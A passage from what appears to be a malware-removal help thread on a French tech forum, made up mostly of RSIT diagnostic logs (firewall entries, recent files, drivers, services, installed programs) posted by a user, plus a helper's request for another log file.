"C:\Documents and Settings\lml-mike\Application Data\Macromedia\Flash Player\www.macromedia.com\bin\octoshape\octoshape.exe"="C:\Documents and Settings\lml-mike\Application Data\Macromedia\Flash Player\www.macromedia.com\bin\octoshape\octoshape.exe:*:Enabled:Octoshape add-in for Adobe Flash Player"
"P:\Prince of Persia\Prince of Persia.exe"="P:\Prince of Persia\Prince of Persia.exe:*:Enabled:Prince of Persia Dx"
"P:\Prince of Persia\PrinceOfPersia_Launcher.exe"="P:\Prince of Persia\PrinceOfPersia_Launcher.exe:*:Enabled:Prince of Persia Update"
"C:\Program Files\Skype\Phone\Skype.exe"="C:\Program Files\Skype\Phone\Skype.exe:*:Enabled:Skype"
"P:\Mirror's Edge\Binaries\MirrorsEdge.exe"="P:\Mirror's Edge\Binaries\MirrorsEdge.exe:*:Enabled:Mirror's Edge™"
"C:\WINDOWS\Winend\mirc.exe"="C:\WINDOWS\Winend\mirc.exe:*:Disabled:mIRC"
"V:\Steam\SteamApps\common\left 4 dead\left4dead.exe"="V:\Steam\SteamApps\common\left 4 dead\left4dead.exe:*:Enabled:Left 4 Dead"

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]
"%windir%\system32\sessmgr.exe"="%windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"
"%windir%\Network Diagnostic\xpnetdiag.exe"="%windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000"
"C:\Program Files\Windows Live\Messenger\msnmsgr.exe"="C:\Program Files\Windows Live\Messenger\msnmsgr.exe:*:Enabled:Windows Live Messenger"

======List of files/folders created in the last 1 months======

2009-03-17 16:05:39 ----SHD---- C:\RECYCLER
2009-03-17 14:42:30 ----A---- C:\ComboFix.txt
2009-03-17 14:39:10 ----A---- C:\Boot.bak
2009-03-17 14:39:07 ----RASHD---- C:\cmdcons
2009-03-17 14:38:17 ----A---- C:\WINDOWS\zip.exe
2009-03-17 14:38:17 ----A---- C:\WINDOWS\SWREG.exe
2009-03-17 14:38:17 ----A---- C:\WINDOWS\sed.exe
2009-03-17 14:38:17 ----A---- C:\WINDOWS\NIRCMD.exe
2009-03-17 14:38:17 ----A---- C:\WINDOWS\grep.exe
2009-03-17 14:38:16 ----A---- C:\WINDOWS\VFIND.exe
2009-03-17 14:38:16 ----A---- C:\WINDOWS\SWXCACLS.exe
2009-03-17 14:38:16 ----A---- C:\WINDOWS\SWSC.exe
2009-03-17 14:38:16 ----A---- C:\WINDOWS\fdsv.exe
2009-03-17 14:37:39 ----D---- C:\WINDOWS\ERDNT
2009-03-17 14:37:39 ----D---- C:\ComboFix
2009-03-17 14:35:39 ----D---- C:\Qoobox
2009-03-17 12:41:56 ----D---- C:\Program Files\trend micro
2009-03-17 12:41:55 ----D---- C:\rsit
2009-03-17 03:01:50 ----HDC---- C:\WINDOWS\$NtUninstallKB960225$
2009-03-17 03:01:43 ----HDC---- C:\WINDOWS\$NtUninstallKB958690$
2009-03-17 03:01:18 ----HDC---- C:\WINDOWS\$NtUninstallKB959772_WM11$
2009-03-09 13:11:53 ----D---- C:\WINDOWS\Winend
2009-03-03 18:39:31 ----N---- C:\WINDOWS\IsUninst.Exe
2009-03-03 18:38:36 ----A---- C:\WINDOWS\IsUn040c.exe
2009-03-01 13:58:44 ----A---- C:\WINDOWS\system32\CmdLineExt03.dll
2009-03-01 12:08:27 ----HD---- C:\$AVG8.VAULT$
2009-02-28 16:11:34 ----A---- C:\WINDOWS\system32\avgrsstx.dll.old
2009-02-28 16:11:34 ----A---- C:\WINDOWS\system32\avgrsstx.dll
2009-02-28 16:11:21 ----D---- C:\Program Files\AVG
2009-02-28 03:00:31 ----HDC---- C:\WINDOWS\$NtUninstallKB967715$
2009-02-21 08:48:18 ----D---- C:\Documents and Settings\lml-mike\Application Data\DeepBurner
2009-02-20 16:12:39 ----A---- C:\WINDOWS\NAVIGMA.INI

======List of files/folders modified in the last 1 months======

2009-03-17 14:42:35 ----D---- C:\WINDOWS\Temp
2009-03-17 14:42:32 ----D---- C:\WINDOWS\system32
2009-03-17 14:42:31 ----D---- C:\WINDOWS
2009-03-17 14:41:23 ----A---- C:\WINDOWS\system.ini
2009-03-17 14:40:34 ----D---- C:\WINDOWS\system32\drivers
2009-03-17 14:40:34 ----D---- C:\WINDOWS\AppPatch
2009-03-17 14:40:32 ----D---- C:\Program Files\Fichiers communs
2009-03-17 14:39:10 ----RASH---- C:\boot.ini
2009-03-17 14:38:39 ----A---- C:\WINDOWS\SchedLgU.Txt
2009-03-17 14:37:46 ----D---- C:\WINDOWS\system32\CatRoot2
2009-03-17 14:37:38 ----D---- C:\WINDOWS\Prefetch
2009-03-17 12:41:56 ----RD---- C:\Program Files
2009-03-17 12:40:18 ----D---- C:\Documents and Settings\lml-mike\Application Data\mIRC
2009-03-17 03:01:53 ----HD---- C:\WINDOWS\inf
2009-03-17 03:01:52 ----RSHDC---- C:\WINDOWS\system32\dllcache
2009-03-17 03:01:47 ----A---- C:\WINDOWS\imsins.BAK
2009-03-17 03:01:12 ----SHD---- C:\WINDOWS\Installer
2009-03-17 03:01:09 ----D---- C:\Documents and Settings\All Users\Application Data\Microsoft Help
2009-03-17 00:41:12 ----D---- C:\Documents and Settings\lml-mike\Application Data\teamspeak2
2009-03-16 15:57:04 ----HD---- C:\WINDOWS\$hf_mig$
2009-03-09 04:24:15 ----A---- C:\WINDOWS\NeroDigital.ini
2009-03-09 03:46:36 ----D---- C:\WINDOWS\system32\DirectX
2009-03-09 03:46:21 ----RSD---- C:\WINDOWS\assembly
2009-03-09 03:44:24 ----D---- C:\Program Files\Fichiers communs\Wise Installation Wizard
2009-03-09 03:44:12 ----D---- C:\Program Files\AGEIA Technologies
2009-03-09 03:43:23 ----D---- C:\Documents and Settings\lml-mike\Application Data\HLSW
2009-03-08 21:07:04 ----D---- C:\Documents and Settings\lml-mike\Application Data\Skype
2009-03-08 21:00:06 ----D---- C:\Documents and Settings\lml-mike\Application Data\skypePM
2009-03-08 01:11:30 ----A---- C:\WINDOWS\system32\wrap_oal.dll
2009-03-08 01:11:30 ----A---- C:\WINDOWS\system32\OpenAL32.dll
2009-03-06 20:54:12 ----D---- C:\Documents and Settings\lml-mike\Application Data\Mumble
2009-03-06 02:15:38 ----HD---- C:\Program Files\InstallShield Installation Information
2009-03-04 12:36:51 ----D---- C:\Logs
2009-03-03 18:41:55 ----D---- C:\Documents and Settings\lml-mike\Application Data\DAEMON Tools Pro
2009-03-01 20:41:49 ----AD---- C:\Documents and Settings\All Users\Application Data\TEMP
2009-02-28 16:11:21 ----D---- C:\Documents and Settings\All Users\Application Data\avg8
2009-02-28 16:10:20 ----D---- C:\Program Files\Fichiers communs\G DATA
2009-02-28 16:06:09 ----SD---- C:\Documents and Settings\lml-mike\Application Data\Microsoft
2009-02-25 21:54:59 ----A---- C:\WINDOWS\system32\MRT.exe
2009-02-20 19:05:09 ----D---- C:\Program Files\Fichiers communs\Microsoft Shared
2009-02-18 16:58:17 ----RSD---- C:\WINDOWS\Fonts

======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R1 AFS2K;AFS2k; C:\WINDOWS\system32\drivers\AFS2K.sys [2008-07-08 82380]
R1 AvgLdx86;AVG AVI Loader Driver x86; C:\WINDOWS\System32\Drivers\avgldx86.sys [2009-03-17 325640]
R1 AvgMfx86;AVG On-access Scanner Minifilter Driver x86; C:\WINDOWS\System32\Drivers\avgmfx86.sys [2009-02-28 27656]
R1 intelppm;Pilote de processeur Intel; C:\WINDOWS\system32\DRIVERS\intelppm.sys [2008-04-13 40576]
R2 acedrv11;acedrv11; \??\C:\WINDOWS\system32\drivers\acedrv11.sys []
R2 GDTdiInterceptor;GDTdiInterceptor; \??\C:\WINDOWS\system32\drivers\GDTdiIcpt.sys []
R3 ADIDTSFiltService;ADI DTS Filter Service; C:\WINDOWS\system32\drivers\adidts.sys [2006-12-08 139776]
R3 ADIHdAudAddService;ADI UAA Function Driver for High Definition Audio Service; C:\WINDOWS\system32\drivers\ADIHdAud.sys [2007-01-16 293888]
R3 AEAudio;AE Audio Service; C:\WINDOWS\system32\drivers\AEAudio.sys [2006-08-06 93952]
R3 Arp1394;Protocole client ARP 1394; C:\WINDOWS\system32\DRIVERS\arp1394.sys [2008-04-13 60800]
R3 GEARAspiWDM;GEARAspiWDM; C:\WINDOWS\System32\drivers\GEARAspiWDM.sys [2008-02-22 16168]
R3 HDAudBus;Pilote de bus Microsoft UAA pour High Definition Audio; C:\WINDOWS\system32\DRIVERS\HDAudBus.sys [2008-04-13 144384]
R3 hidusb;Pilote de classe HID Microsoft; C:\WINDOWS\system32\DRIVERS\hidusb.sys [2008-04-13 10368]
R3 mouhid;Pilote HID de souris; C:\WINDOWS\system32\DRIVERS\mouhid.sys [2004-08-05 12288]
R3 MTsensor;ATK0110 ACPI UTILITY; C:\WINDOWS\system32\DRIVERS\ASACPI.sys [2004-08-13 5810]
R3 NIC1394;Pilote réseau 1394; C:\WINDOWS\system32\DRIVERS\nic1394.sys [2008-04-13 61824]
R3 nv;nv; C:\WINDOWS\system32\DRIVERS\nv4_mini.sys [2008-10-07 6133856]
R3 usbaudio;Pilote USB audio (WDM); C:\WINDOWS\system32\drivers\usbaudio.sys [2008-04-13 60032]
R3 usbccgp;Pilote parent générique USB Microsoft; C:\WINDOWS\system32\DRIVERS\usbccgp.sys [2008-04-13 32128]
R3 usbehci;Pilote miniport de contrôleur d'hôte amélioré Microsoft USB 2.0; C:\WINDOWS\system32\DRIVERS\usbehci.sys [2008-04-13 30208]
R3 usbhub;Concentrateur USB2; C:\WINDOWS\system32\DRIVERS\usbhub.sys [2008-04-13 59520]
R3 usbuhci;Pilote miniport de contrôleur hôte universel USB Microsoft; C:\WINDOWS\system32\DRIVERS\usbuhci.sys [2008-04-13 20608]
R3 yukonwxp;NDIS5.1 Miniport Driver for Marvell Yukon Ethernet Controller; C:\WINDOWS\system32\DRIVERS\yk51x86.sys [2006-07-26 248832]
S3 61883;Pilote d'unité 61883; C:\WINDOWS\system32\DRIVERS\61883.sys [2008-04-13 48128]
S3 a5lrjchr;a5lrjchr; C:\WINDOWS\system32\drivers\a5lrjchr.sys []
S3 Avc;Périphérique AVC; C:\WINDOWS\system32\DRIVERS\avc.sys [2008-04-13 38912]
S3 catchme;catchme; \??\C:\ComboFix\catchme.sys []
S3 CCDECODE;Décodeur sous-titre fermé; C:\WINDOWS\system32\DRIVERS\CCDECODE.sys [2008-04-13 17024]
S3 HPZid412;IEEE-1284.4 Driver HPZid412; C:\WINDOWS\system32\DRIVERS\HPZid412.sys [2003-03-09 51024]
S3 HPZipr12;Print Class Driver for IEEE-1284.4 HPZipr12; C:\WINDOWS\system32\DRIVERS\HPZipr12.sys [2003-03-09 16080]
S3 HPZius12;USB to IEEE-1284.4 Translation Driver HPZius12; C:\WINDOWS\system32\DRIVERS\HPZius12.sys [2003-03-09 21456]
S3 MSDV;Microsoft DV Camera and VCR; C:\WINDOWS\system32\DRIVERS\msdv.sys [2008-04-13 51200]
S3 MSTEE;Convertisseur en T/site-à-site de répartition Microsoft; C:\WINDOWS\system32\drivers\MSTEE.sys [2008-04-13 5504]
S3 NABTSFEC;Codec NABTS/FEC VBI; C:\WINDOWS\system32\DRIVERS\NABTSFEC.sys [2008-04-13 85248]
S3 NdisIP;Connection TV/vidéo Microsoft; C:\WINDOWS\system32\DRIVERS\NdisIP.sys [2008-04-13 10880]
S3 nm;Pilote du Moniteur réseau; C:\WINDOWS\system32\DRIVERS\NMnt.sys [2008-04-13 40320]
S3 nmwcdnsu;Nokia USB Flashing Phone Parent; C:\WINDOWS\system32\drivers\nmwcdnsu.sys [2008-02-01 138112]
S3 nmwcdnsuc;Nokia USB Flashing Generic; C:\WINDOWS\system32\drivers\nmwcdnsuc.sys [2008-02-01 8320]
S3 NPF;NetGroup Packet Filter Driver; C:\WINDOWS\system32\drivers\npf.sys [2007-11-06 34064]
S3 pccsmcfd;PCCS Mode Change Filter Driver; C:\WINDOWS\system32\DRIVERS\pccsmcfd.sys [2008-08-26 18816]
S3 QCDonner;Logitech QuickCam Express; C:\WINDOWS\system32\DRIVERS\OVCD.sys [2001-08-17 28032]
S3 SLIP;Détrameur décalage BDA; C:\WINDOWS\system32\DRIVERS\SLIP.sys [2008-04-13 11136]
S3 SONYPVU1;Pilote de filtrage Sony USB (SONYPVU1); C:\WINDOWS\system32\DRIVERS\SONYPVU1.SYS [2001-08-17 7552]
S3 streamip;BDA IPSink; C:\WINDOWS\system32\DRIVERS\StreamIP.sys [2008-04-13 15232]
S3 upperdev;upperdev; C:\WINDOWS\system32\DRIVERS\usbser_lowerflt.sys [2008-06-06 8064]
S3 usbprint;Classe d'imprimantes USB Microsoft; C:\WINDOWS\system32\DRIVERS\usbprint.sys [2008-04-13 25856]
S3 usbscan;Pilote de scanneur USB; C:\WINDOWS\system32\DRIVERS\usbscan.sys [2008-04-13 15104]
S3 usbser;USB Modem Driver; C:\WINDOWS\system32\drivers\usbser.sys [2008-04-13 26112]
S3 UsbserFilt;UsbserFilt; C:\WINDOWS\system32\DRIVERS\usbser_lowerfltj.sys [2008-05-07 8064]
S3 USBSTOR;Pilote de stockage de masse USB; C:\WINDOWS\system32\DRIVERS\USBSTOR.SYS [2008-04-13 26368]
S3 VX6000;Microsoft LifeCam VX-6000; C:\WINDOWS\system32\DRIVERS\VX6000Xp.sys [2006-06-30 2383152]
S3 Wdf01000;Wdf01000; C:\WINDOWS\system32\DRIVERS\Wdf01000.sys [2006-11-02 492000]
S3 WSTCODEC;Codec Teletext standard; C:\WINDOWS\system32\DRIVERS\WSTCODEC.SYS [2008-04-13 19200]
S3 WudfRd;Windows Driver Foundation - User-mode Driver Framework Reflector; C:\WINDOWS\system32\DRIVERS\wudfrd.sys [2006-09-15 82688]
S4 IntelIde;IntelIde; C:\WINDOWS\system32\drivers\IntelIde.sys []
S4 mchInjDrv;mchInjDrv; \??\C:\DOCUME~1\lml-mike\LOCALS~1\Temp\mc21.tmp []

======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R2 Autodesk Licensing Service;Autodesk Licensing Service; C:\Program Files\Fichiers communs\Autodesk Shared\Service\AdskScSrv.exe [2008-09-18 72704]
R2 avg8wd;AVG8 WatchDog; C:\logs\avg\avgwdsvc.exe [2009-03-17 298264]
R2 Diskeeper;Diskeeper; C:\Logs\Diskeeper\DkService.exe [2004-10-05 577644]
R2 JavaQuickStarterService;Java Quick Starter; C:\Program Files\Java\jre6\bin\jqs.exe [2008-11-10 152984]
R2 LightScribeService;LightScribeService Direct Disc Labeling Service; C:\Program Files\Fichiers communs\LightScribe\LSSrvc.exe [2006-10-19 61440]
R2 mi-raysat_3dsmax8;RaySat_3dsmax8 Server; V:\Logs\3dsMax8\mentalray\satellite\raysat_3dsmax8server.exe [2005-09-21 65536]
R2 MSCamSvc;MSCamSvc; C:\Program Files\Microsoft LifeCam\MSCamSvc.exe [2006-06-30 187184]
R2 NVSvc;NVIDIA Display Driver Service; C:\WINDOWS\system32\nvsvc32.exe [2008-10-07 163908]
R2 SQLWriter;SQL Server VSS Writer; C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe [2007-02-10 89968]
R2 WudfSvc;Windows Driver Foundation - User-mode Driver Framework; C:\WINDOWS\system32\svchost.exe [2008-04-13 14336]
R3 NMIndexingService;NMIndexingService; C:\Program Files\Fichiers communs\Ahead\Lib\NMIndexingService.exe [2006-12-23 262144]
R3 ServiceLayer;ServiceLayer; C:\Program Files\PC Connectivity Solution\ServiceLayer.exe [2008-11-11 620544]
S3 Adobe LM Service;Adobe LM Service; C:\Program Files\Fichiers communs\Adobe Systems Shared\Service\Adobelmsvc.exe [2008-09-18 72704]
S3 aspnet_state;ASP.NET State Service; C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe [2007-04-13 33632]
S3 clr_optimization_v2.0.50727_32;.NET Runtime Optimization Service v2.0.50727_X86; C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe [2007-04-13 68952]
S3 FontCache3.0.0.0;Windows Presentation Foundation Font Cache 3.0.0.0; C:\WINDOWS\Microsoft.Net\Framework\v3.0\WPF\PresentationFontCache.exe [2006-10-20 36864]
S3 IDriverT;InstallDriver Table Manager; C:\Program Files\Fichiers communs\InstallShield\Driver\1050\Intel 32\IDriverT.exe [2005-02-24 73728]
S3 idsvc;Windows CardSpace; C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe [2006-10-30 741376]
S3 MSSQL$SONY_MEDIAMGR2;SQL Server (SONY_MEDIAMGR2); C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe [2008-12-18 29181272]
S3 odserv;Microsoft Office Diagnostics Service; C:\Program Files\Fichiers communs\Microsoft Shared\OFFICE12\ODSERV.EXE [2007-08-24 443776]
S3 ose;Office Source Engine; C:\Program Files\Fichiers communs\Microsoft Shared\Source Engine\OSE.EXE [2006-10-26 145184]
S3 Pml Driver HPZ12;Pml Driver HPZ12; C:\WINDOWS\system32\HPZipm12.exe [2003-03-09 65795]
S3 rpcapd;Remote Packet Capture Protocol v.0 (experimental); C:\Program Files\WinPcap\rpcapd.exe [2007-11-06 92792]
S3 WMPNetworkSvc;Service Partage réseau du Lecteur Windows Media; C:\Program Files\Windows Media Player\WMPNetwk.exe [2006-11-03 918016]
S4 MSSQLServerADHelper;SQL Server Active Directory Helper; C:\Program Files\Microsoft SQL Server\90\Shared\sqladhlp90.exe [2005-10-14 45272]
S4 NetTcpPortSharing;Net.Tcp Port Sharing Service; C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe [2006-10-30 122880]
S4 SQLBrowser;SQL Server Browser; C:\Program Files\Microsoft SQL Server\90\Shared\sqlbrowser.exe [2007-02-10 242544]

-----------------EOF-----------------
Lyonnais92 Posts 25708 Status Security contributor 1 537
 
Re,

In your case, I need c:\rsit\info.txt
lml-mike Posts 487 Status Contributor 122
 
Oops, sorry!

info.txt logfile of random's system information tool 1.05 2009-03-17 12:42:11

======Uninstall list======

-->C:\Logs\DivX\DivXConverterUninstall.exe /CONVERTER
-->C:\Program Files\Nero\Nero 7\nero\uninstall\UNNERO.exe /UNINSTALL
-->MsiExec /X{E4D15328-8C89-484B-B9AA-F5BE9EA6D01C}
-->rundll32.exe setupapi.dll,InstallHinfSection DefaultUninstall 132 C:\WINDOWS\INF\PCHealth.inf
123 AVI to GIF Converter 3.0-->"C:\Logs\123 AVI to GIF Converter\unins000.exe"
2007 Microsoft Office Suite Service Pack 1 (SP1)-->msiexec /package {90120000-0011-0000-0000-0000000FF1CE} /uninstall {BEE75E01-DD3F-4D5F-B96C-609E6538D419}
2007 Microsoft Office Suite Service Pack 1 (SP1)-->msiexec /package {90120000-0015-040C-0000-0000000FF1CE} /uninstall {A0353900-21A2-42CF-B973-883500A027F7}
2007 Microsoft Office Suite Service Pack 1 (SP1)-->msiexec /package {90120000-0016-040C-0000-0000000FF1CE} /uninstall {A0353900-21A2-42CF-B973-883500A027F7}
2007 Microsoft Office Suite Service Pack 1 (SP1)-->msiexec /package {90120000-0018-040C-0000-0000000FF1CE} /uninstall {A0353900-21A2-42CF-B973-883500A027F7}
2007 Microsoft Office Suite Service Pack 1 (SP1)-->msiexec /package {90120000-0019-040C-0000-0000000FF1CE} /uninstall {A0353900-21A2-42CF-B973-883500A027F7}
2007 Microsoft Office Suite Service Pack 1 (SP1)-->msiexec /package {90120000-001A-040C-0000-0000000FF1CE} /uninstall {A0353900-21A2-42CF-B973-883500A027F7}
2007 Microsoft Office Suite Service Pack 1 (SP1)-->msiexec /package {90120000-001B-040C-0000-0000000FF1CE} /uninstall {A0353900-21A2-42CF-B973-883500A027F7}
2007 Microsoft Office Suite Service Pack 1 (SP1)-->msiexec /package {90120000-001F-0401-0000-0000000FF1CE} /uninstall {5A2F65A4-808F-4A1E-973E-92E17824982D}
2007 Microsoft Office Suite Service Pack 1 (SP1)-->msiexec /package {90120000-001F-0407-0000-0000000FF1CE} /uninstall {2AB528A5-BB1B-4EBE-8E51-AD0C4CD33CA9}
2007 Microsoft Office Suite Service Pack 1 (SP1)-->msiexec /package {90120000-001F-0409-0000-0000000FF1CE} /uninstall {3EC77D26-799B-4CD8-914F-C1565E796173}
2007 Microsoft Office Suite Service Pack 1 (SP1)-->msiexec /package {90120000-001F-040C-0000-0000000FF1CE} /uninstall {430971B1-C31E-45DA-81E0-72C095BAB72C}
2007 Microsoft Office Suite Service Pack 1 (SP1)-->msiexec /package {90120000-001F-0413-0000-0000000FF1CE} /uninstall {B3F4DC34-7F60-4B7C-A79F-1C13012D99D4}
2007 Microsoft Office Suite Service Pack 1 (SP1)-->msiexec /package {90120000-001F-0C0A-0000-0000000FF1CE} /uninstall {F7A31780-33C4-4E39-951A-5EC9B91D7BF1}
2007 Microsoft Office Suite Service Pack 1 (SP1)-->msiexec /package {90120000-0044-040C-0000-0000000FF1CE} /uninstall {A0353900-21A2-42CF-B973-883500A027F7}
ABC (remove only)-->C:\Logs\ABC\Uninstall.exe
AC3Filter (remove only)-->C:\Logs\AC3Filter\uninstall.exe
Adobe Bridge 1.0-->MsiExec.exe /I{B74D4E10-6884-0000-0000-000000000101}
Adobe Common File Installer-->MsiExec.exe /I{8EDBA74D-0686-4C99-BFDD-F894678E5101}
Adobe Flash Player 10 Plugin-->C:\WINDOWS\system32\Macromed\Flash\uninstall_plugin.exe
Adobe Flash Player ActiveX-->C:\WINDOWS\system32\Macromed\Flash\uninstall_activeX.exe
Adobe Help Center 1.0-->MsiExec.exe /I{E9787678-119F-4D52-B551-6739B2B22101}
Adobe Photoshop CS2-->msiexec /I {236BB7C4-4419-42FD-040C-1E257A25E34D}
Adobe Reader 9 - Français-->MsiExec.exe /I{AC76BA86-7AD7-1036-7B44-A90000000001}
Adobe Shockwave Player 11-->C:\WINDOWS\system32\adobe\SHOCKW~1\UNWISE.EXE C:\WINDOWS\system32\Adobe\SHOCKW~1\Install.log
Adobe Stock Photos 1.0-->MsiExec.exe /I{786C5747-0C40-4930-9AFE-113BCE553101}
Apple Software Update-->MsiExec.exe /I{6956856F-B6B3-4BE0-BA0B-8F495BE32033}
Archiveur WinRAR-->C:\Logs\WinRAR\uninstall.exe
ASIO4ALL-->v:\FL Studio 8\ASIO4ALL v2\uninstall.exe
Assistant de connexion Windows Live-->MsiExec.exe /I{DCE8CD14-FBF5-4464-B9A4-E18E473546C7}
Audacity 1.2.6-->"C:\Logs\Audacity\unins000.exe"
Autodesk 3ds Max 8-->MsiExec.exe /I{DBB313D6-4B13-4961-BD5F-673CDA1793CC}
Autodesk DWF Viewer-->C:\PROGRA~1\Autodesk\AUTODE~1\Setup.exe /remove
AVG 8.5-->C:\logs\avg\setup.exe /UNINSTALL
AviSynth 2.5-->"C:\Logs\AviSynth 2.5\Uninstall.exe"
Backburner-->MsiExec.exe /I{3D347E6D-5A03-4342-B5BA-6A771885F379}
BluffTitler-->"C:\Logs\BluffTitler\uninstall.exe"
Boris FX-->RunDll32 C:\PROGRA~1\FICHIE~1\INSTAL~1\PROFES~1\RunTime\0701\Intel32\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{EED27288-EA1A-44E9-913C-648FFC9ADDF0}\Setup.exe" -l0x9 
Boris Graffiti Ltd-->RunDll32 C:\PROGRA~1\FICHIE~1\INSTAL~1\PROFES~1\RunTime\0701\Intel32\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{0B5889E0-0C2B-4E68-8A7C-D3A37479A061}\setup.exe" -l0x9 
CCleaner (remove only)-->"C:\Logs\CCleaner\uninst.exe"
Choice Guard-->MsiExec.exe /I{8FFC5648-FAF8-43A3-BC8F-42BA1E275C4E}
Collab-->C:\Program Files\Image-Line\Collab\uninstall.exe
ConvertHelper 2.2-->"C:\Logs\ConvertHelper\unins000.exe"
CoreAAC Audio Decoder (remove only)-->"C:\WINDOWS\system32\CoreAAC-uninstall.exe"
Correctif pour Lecteur Windows Media 11 (KB939683)-->"C:\WINDOWS\$NtUninstallKB939683$\spuninst\spuninst.exe"
Correctif pour Windows XP (KB952287)-->"C:\WINDOWS\$NtUninstallKB952287$\spuninst\spuninst.exe"
Counter-Strike: Source-->"V:\Steam\steam.exe" steam://uninstall/240
Counter-Strike-->"V:\Steam\steam.exe" steam://uninstall/10
DeepBurner v1.9.0.228-->"C:\Logs\DeepBurner\Uninstall.exe" "C:\Logs\DeepBurner\install.log" -u
DEVIL MAY CRY 4-->MsiExec.exe /I{D4E5A687-797D-44B1-8F96-4FD7A24166A9}
Direct Show Ogg Vorbis Filter (remove only)-->"C:\WINDOWS\system32\OggDSuninst.exe"
Diskeeper Professional Edition-->MsiExec.exe /I{E87BE7F8-3077-40C1-8592-956F649A2781}
Disque de souvenirs HP-->MsiExec.exe /X{B376402D-58EA-45EA-BD50-DD924EB67A70}
DivX Codec 3.1alpha release-->C:\WINDOWS\system32\rundll32.exe setupapi,InstallHinfSection Remove_DivX 132 C:\WINDOWS\INF\DivX.inf
DivX Codec-->C:\Logs\DivX\DivXCodecUninstall.exe /CODEC
DivX Converter-->C:\Logs\DivX\DivXConverterUninstall.exe /CONVERTER
DivX Player-->C:\Logs\DivX\DivXPlayerUninstall.exe /PLAYER
DivX Web Player-->C:\Program Files\DivX\DivXWebPlayerUninstall.exe /PLUGIN
DU Meter-->"C:\Logs\DU Meter\unins000.exe"
eMule-->"V:\eMule\Uninstall.exe"
Fallout 3-->RunDll32 C:\PROGRA~1\FICHIE~1\INSTAL~1\PROFES~1\RunTime\11\00\Intel32\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{974C4B12-4D02-4879-85E0-61C95CC63E9E}\setup.exe" -l0x40c  -removeonly
ffdshow [rev 1008] [2007-03-08]-->"C:\Logs\ffdshow\unins000.exe"
Final Fantasy VII-->C:\WINDOWS\IsUn040c.exe -fv:\FF7\Uninst.isu
FL Studio 8-->v:\FL Studio 8\uninstall.exe
FlashFXP v3-->C:\Logs\FlashFXP\unins000.exe
Fraps (remove only)-->"C:\Logs\Fraps\uninstall.exe"
Free FLV Converter V 6.1.0-->"C:\Logs\Free FLV Converter\unins000.exe"
GDR 3077 for SQL Server Database Services 2005 ENU (KB960089)-->C:\WINDOWS\SQL9_KB960089_ENU\Hotfix.exe /Uninstall
GEAR 32bit Driver Installer-->MsiExec.exe /X{E89B484C-B913-49A0-959B-89E836001658}
Haali Media Splitter-->"C:\Logs\MatroskaSplitter\uninstall.exe"
HijackThis 2.0.2-->"C:\Program Files\trend micro\HijackThis.exe" /uninstall
HLSW v1.2.1.2-->"C:\Logs\HLSW\unins000.exe"
Hotfix for Windows Media Format 11 SDK (KB929399)-->"C:\WINDOWS\$NtUninstallKB929399$\spuninst\spuninst.exe"
hp psc 1200 series-->rundll32 hpzcon07.dll,VendorJettison hp psc 1200 series
IL Download Manager-->C:\Program Files\Image-Line\Downloader\uninstall.exe
Installation Windows Live-->C:\Program Files\Windows Live\Installer\wlarp.exe
Installation Windows Live-->MsiExec.exe /I{7370DF47-B4F9-4279-BFC3-3F09919F720D}
Java(TM) 6 Update 11-->MsiExec.exe /X{26A24AE4-039D-4CA4-87B4-2F83216010FF}
Lame ACM MP3 Codec-->C:\WINDOWS\system32\rundll32.exe setupapi,InstallHinfSection Remove_LameMP3 132 C:\WINDOWS\INF\LameACM.inf
Lecteur Windows Media 11-->"C:\Program Files\Windows Media Player\Setup_wm.exe" /Uninstall
Magic Bullet Editors Vegas-->C:\WINDOWS\unvise32.exe c:\logs\vegas pro 8.0\video plug-ins\Magic bullet editor 2\Magic Bullet Editors Vegas\mbeditorsvegas.log
Malwarebytes' Anti-Malware-->"C:\Logs\Malwarebytes' Anti-Malware\unins000.exe"
Media Player Classic fr-->"C:\Logs\Media Player Classic\uninstall.exe"
MeGUI modern media encoder (remove only)-->"C:\Logs\megui\megui-uninstall.exe"
Messenger Plus! Live-->"C:\Logs\Messenger Plus! Live\Uninstall.exe"
Microsoft .NET Framework 2.0-->C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\Microsoft .NET Framework 2.0\install.exe
Microsoft .NET Framework 3.0-->C:\WINDOWS\Microsoft.NET\Framework\v3.0\Microsoft .NET Framework 3.0\setup.exe
Microsoft .NET Framework 3.0-->MsiExec.exe /X{15095BF3-A3D7-4DDF-B193-3A496881E003}
Microsoft Compression Client Pack 1.0 for Windows XP-->"C:\WINDOWS\$NtUninstallMSCompPackV1$\spuninst\spuninst.exe"
Microsoft Games for Windows - LIVE -->MsiExec.exe /X{4AA3D64E-9EC3-4B0F-AB91-5885AC55641F}
Microsoft Games for Windows - LIVE Redistributable-->MsiExec.exe /X{FD052FB9-FE90-4438-B355-15EDC89D8FB1}
Microsoft Internationalized Domain Names Mitigation APIs-->"C:\WINDOWS\$NtServicePackUninstallIDNMitigationAPIs$\spuninst\spuninst.exe"
Microsoft Kernel-Mode Driver Framework Feature Pack 1.5-->"C:\WINDOWS\$NtUninstallWdf01005$\spuninst\spuninst.exe"
Microsoft LifeCam-->MsiExec.exe /X{6F5D254A-5869-4B94-BF55-D68938FD1CC6}
Microsoft National Language Support Downlevel APIs-->"C:\WINDOWS\$NtServicePackUninstallNLSDownlevelMapping$\spuninst\spuninst.exe"
Microsoft Office Access MUI (French) 2007-->MsiExec.exe /X{90120000-0015-040C-0000-0000000FF1CE}
